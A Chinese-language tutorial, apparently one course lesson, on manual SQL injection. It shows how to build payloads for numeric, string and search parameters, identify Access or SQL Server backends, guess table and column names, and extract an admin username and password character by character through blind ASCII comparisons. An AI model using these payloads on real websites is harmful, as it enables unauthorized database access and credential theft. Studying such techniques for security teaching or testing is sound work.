分析SQL手工注入一般步骤_sql手工注入过程

首先，判断环境，寻找注入点，判断数据库类型，我们在前面的课程讲过。

其次，根据注入参数类型，在脑海中重构SQL语句的原貌.

按参数类型主要分为下面三种：

(1) ID=131 这类注入的参数是数字型，SQL语句原貌大致如下：
Select * from 表名 where 字段=131
注入的参数为ID=49 And [查询条件]，即是生成语句：
Select * from 表名 where 字段=131 And [查询条件]

(2) Class=连续剧 这类注入的参数是字符型，SQL语句原貌大致概如下：
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ，即是生成语句：
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’

(3) 搜索时没过滤参数的，如keyword=关键字，SQL语句原貌大致如下：
Select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%25’=’， 即是生成语句：
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’

实例：

第一步：判断环境，寻找注入点

第二步：判断数据类型
and (select count() from sysobjects)>0
and (select count() from msysobjects)>0

第三步：猜表名
And (Select Count(*) from Admin)>=0
如果页面就与ID=131的相同，说明附加条件成立，即表Admin存在，反之，即不存在（请牢记这种方法）。如此循环，直至猜到表名为止。

第四步：猜字段
表名猜出来后，将Count(*)替换成Count(字段名)，用同样的原理猜解字段名。
And (Select Count(username) from Admin)>=0

PS：如果是SQLServer的库，我们可以通过提交些特殊字符来得到相关的表名和字段，我们在以后的课程中会做介绍。

第五步：猜字段的值（Ascii逐字解码法）
and (select top 1 len(username) from Admin)>0
and (select top 1 asc(mid(username,N,1)) from Admin)>0

表名：admin

字段：username

字段值：
username内容:xiaxiang
ASCII码：120　105　97　120　105　97　110　103
password内容:345544386
ASCII码：51　52　53　53　52　52　51　56　54

PS：英文和数字的ASCII码在1-128之间，可以用折半法加速猜解，有语言基础的朋友可以写个程序测试下，效率会有大大的提高。